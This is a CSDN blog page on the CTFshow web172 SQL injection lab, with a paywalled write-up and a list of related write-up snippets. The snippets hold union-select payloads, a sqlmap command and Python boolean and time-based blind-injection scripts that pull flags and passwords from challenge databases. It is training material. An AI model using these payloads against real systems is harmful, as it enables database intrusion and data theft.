ctfshow-web入门-sql注入-web172

最新推荐文章于 2024-10-27 21:59:22 发布

HkD01L

最新推荐文章于 2024-10-27 21:59:22 发布

阅读量483

点赞数

CC 4.0 BY-SA版权

分类专栏： ctfshow SQL注入文章标签： sql 数据库

本文链接：https://blog.csdn.net/HkD01L/article/details/127991704

本文介绍了ctfshow-web中的一个SQL注入题目，通过分析页面变化确定注入点，利用联合查询技巧获取数据库信息，包括数据库名、表名及列名，并最终成功爆破获取到flag。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

题目描述

查询语句
//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//检查结果是否有flag
    if($row->username!

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

HkD01L

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

CTFshow sql注入上篇(web171-220)

Kradress的博客

03-18

7579

目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结前言师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注

ctfshow-web入门-sql注入-web171

HkD01L的博客

11-22

397

此题为【从0开始学web】系列第一百七十一题此系列题目从最基础开始，题目遵循循序渐进的原则从此题开始的150道题全部为sql注入，准备好了吗？

1 条评论您还未登录，请先登录后发表或查看评论

CTFSHOW web入门——web172

m0_74093152的博客

03-26

444

知道了数据库名字是ctfshow_web，有ctfshow_user和ctfshow_user2两张表。1’ order by 2--+的时候没有报错，而3的时候报错，说明该表有两列。有三个列id，username，password。首先判断有无注入点，页面有变化，因此存在注入点。接着查询ctfshow_user2中的列。查询password中的数据。

CTFshow web入门web172-sql2

weixin_74336671的博客

11-15

233

直接：' union select 1,password from ctfshow_user2 where username='flag'--+返回结果中的username不允许等于flag，不输出username不就完事了，这里应该过滤ctfshow才有意义。

ctfshow-web入门-web172

m0_74167420的博客

10-25

1104

第四步：使用database()，查询数据库 1' union select 1, database() --+第一步：确定sql注入的类型。1' or 1=1 确定为字符型(根据上面的php代码也能确定)应该使用下列查询语句：加个括号。第二步：使用order by确定列数 1' order by 3 --+第三步：测试回显位：1' union select 1,2 --+该题目与上一个题目不是同一个类型，该题目需要进行sql联合查询。第二个x代表是需要确定是有几个列，并且确定回显字段。

ctfshow-web入门-sql注入（web171-web175）

Welcome To Myon'Blog !

07-31

2443

这里只出了一个 id，因为换行导致我们误判为到了最后一个字符，因为我们的字典里只包括数字、小写字母和下划线，因此字符没找到，便跳出外层循环结束了代码。判断一下这次又是三个字段数了，因为还是对输出过滤了 flag，所有我们还是不查用户名，用占位符占位即可。接下来我们先判断下它数据库名的长度，这个其实可以通过 burpsuite 的攻击模块爆破的，没关系，我们这里手写一遍，也锻炼下我们 python 的能力。

CTFShow-web入门WriteUp（长期更新）

子推的Blog

03-26

794

web21 下载zip文件是后台密码字典，用户名猜测admin，先进行抓包没有发现我们传输的参数，但是HTTP请求头里面有这样的参数解码之后发现这是我们传输的参数，所以开始爆破因为编码前几位是admin:的base64，所以我们只需要把密码所在段设置为变量即可然后对payload进行base64加密，进行爆破这里有点需要注意，我们要关闭Payload Encoding，因为我们base64加密结果可能会存在=或者==，payload encoding会将=进行编码或者写python脚

ctfshow-WEB-web2_ctf

2401_84297618的博客

04-28

663

ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可在用户名的输入框中输入万能账号 a’ or true #,密码随便输登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输。

2024年网安最新ctfshow-WEB-web6_ctf(1)

2401_84297899的博客

05-03

1250

ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。

ctf_show笔记篇（web入门---sql注入）171-189

whale_waves的博客

03-12

1455

例如：原理，flag是十六进制的，最大到f所以可以用后面的英文来替换。利用into outfile来将查询到的表的内容写入到服务器的文件里。但这种情况一般需要知道web的地址例如/var/www/html/再利用python或者其他或者人工逆向替换回来。

ctfshow-sql注入-超详解(172-200)

qq_50589021的博客

08-05

3193

前言今天是2021/7/25，正式进入sql注入专题，目标：加强python的学习，达到通过写python脚本，加快注入速度的程度，掌握sql在php编程中的一系列查询语句。新手区可以看看Y4师傅以前记录的小笔记 SQL注入之MySQL注入的学习笔记(一) SQL注入之MySQL注入学习笔记(二) 2021-7-25 web172、web173——hex() 、to_base64() 查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password fro

CTFshow web(sql注入171-175）

csjjjd的博客

02-20

930

替换：将数据to_base64加密，然后将里面所有的数字用replace()替换。注意这里已经提示你了，只要知道是ctfshow_user，就可以拿到flag。然后接着一个个查询看看哪个表里面有flag，经测试，第二个表有flag。ps：注意把ctfshow后面的都删去，改成1.txt。那个过滤函数别被骗了，照样该怎么做怎么做。还是那个语句查询表名。还是那个语句查询表名。base64解码就好。

ctfshow SQL注入Web171-174

m0_62584974的博客

04-25

1628

2022/4/24 SQL注入Web171 语法：查询表中的数据查询所有行命令： select <字段1，字段2，...> from < 表名 > where < 条件> 例如：查看表 MyClass 中所有数据 mysql> select * from MyClass;查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='fl.

CTFshow--web入门（171-184）

2402_82963715的博客

07-28

1750

CTFshow--web入门171-184的wp。

CTFSHOW web入门 sql注入无过滤注入 web171-175

sinat_41572027的博客

07-07

1951

ctfshow web171-174

CTFshow_web入门_SQL_web171-180

weixin_43896504的博客

07-21

583

SQL注入

CTFshow刷题日记-WEB-SQL注入part1（171-184）

Love&Share

09-19

1253

SQL注入篇-共150道 mysql字符串函数 UPPER(s) 将字符串转换为大写 UCASE(s) 将字符串转换为大写 SUBSTRING(s, start, length) 从字符串 s 的 start 位置截取长度为 length 的子字符串 SUBSTRING_INDEX(s, delimiter, number) 返回从字符串 s 的第 number 个出现的分隔符 delimiter 之后的子串。如果 number 是正数，返回第 number 个字符左边的字符串。

ctfshow(171,172，173)--SQL注入--联合注入

m0_56019217的博客

10-27

881

由于会检查返回的数据中有没有字符串flag，所以我们最后只返回password字段即可，因为username字段中含有flag，会导致被匹配到，从而获取数据失败。将前面的数字变为-1，因为数据表中没有id=-1的行，这样就不会查询出数据，防止查询的数据覆盖我们需要的回显。由于username不可能在不等于flag的同时又等于flag，所以不能查询到flag。对象row指的是查询出的行，如果该对象的username不为flag，才能查询成功。的含义是当查询到相应的数据时，只返回一条数据。

CTFshow-WEB入门-SQL注入(上)

feng的博客

02-05

2800

web171 无任何过滤，直接注就完事了。 ' union select 1,2,group_concat(password) from ctfshow_user-- - web172 ' union select 1,group_concat(password) from ctfshow_user2--+ web173 ' union select 1,2,group_concat(password) from ctfshow_user3-- - 虽然对返回的结果进行了过滤flag，但是flag是u

ctfshow-sql注入

最新发布

06-19

### CTFShow SQL注入技术学习与解析 CTFShow平台上的SQL注入题目是学习和实践SQL注入技术的良好资源。以下将从基础到高级，结合引用内容[^1]，介绍如何在CTFShow平台上进行SQL注入的练习与解析。 #### 一、SQL注入基础知识 SQL注入是一种攻击技术，通过向应用程序输入恶意SQL代码，绕过安全验证或提取数据库信息。SQL注入的核心在于构造特殊字符或语句，使程序执行非预期的SQL命令[^2]。 #### 二、CTFShow SQL注入题目解析以下是对CTFShow平台上常见SQL注入题目的解析： 1. **查表操作** 使用`sqlmap`工具自动化查表是一个常见的入门方法。例如，使用以下命令可以列出目标数据库中的所有表： ```bash sqlmap -u "http://f6405b3c-b606-47bd-b2b1-443c31e912c6.challenge.ctf.show/api/?id=12" --user-agent sqlmap --referer http://f6405b3c-b606-47bd-b2b1-443c31e912c6.challenge.ctf.show/sqlmap.php -D ctfshow_web --tables ``` 这段命令利用了`sqlmap`工具，通过指定URL参数`id`，并设置数据库名称为`ctfshow_web`来枚举所有表名。 2. **查询列名** 查询列名时，可以通过`UNION SELECT`语句构造payload。例如，以下payload用于查询`users`表的列名： ```sql url?id = 1 union select 1,2,column_name from infomation_schema.columns where table_table = 'users' ``` 该语句通过`information_schema.columns`表获取目标表的列名[^3]。 3. **布尔盲注与时间盲注** 布尔盲注和时间盲注是两种常见的盲注方法。以下是一个布尔盲注的Python脚本示例： ```python import requests import string url = 'http://b6c2fdd0-e452-4aee-84ce-73716e1a42cd.challenge.ctf.show/api/index.php' dic = string.digits + string.ascii_lowercase + '{}-_' out = '' for j in range(1, 50): for k in dic: payload = f"u=if(substr((select flagaabc from ctfshow_flaga),{j},1)='{k}',sleep(0.1),0)" re = requests.get(url, params=payload) if re.elapsed.total_seconds() > 2: out += k break print(out) ``` 上述脚本通过构造`substr`函数逐步提取目标字段的内容，并结合`sleep`函数实现时间盲注[^4]。 4. **DELETE语句的时间盲注** 当题目限制无法直接插入数据时，可以考虑使用时间盲注。以下是一个基于`DELETE`语句的时间盲注脚本： ```python import requests import time import urllib.parse url = "http://b37e7121-22c6-4917-bfa5-ddc38a0ed78f.challenge.ctf.show/api/delete.php" s = '0123456789abcdef-' flag = 'ctfshow{' for i in range(9, 46): for j in s: data = {'id': f'0||if(substr((select flag from flag),{i},1)="{j}",sleep(1),0)'} try: requests.post(url, data=data, timeout=1) except: flag += j print(flag) break time.sleep(1) ``` 该脚本通过构造`if`条件语句，结合`sleep`函数延迟响应时间，从而判断每个字符是否正确[^5]。 #### 三、总结 CTFShow平台上的SQL注入题目涵盖了从基础到高级的各种技巧，包括查表、查询列名、布尔盲注和时间盲注等。通过实践这些题目，可以系统地掌握SQL注入技术。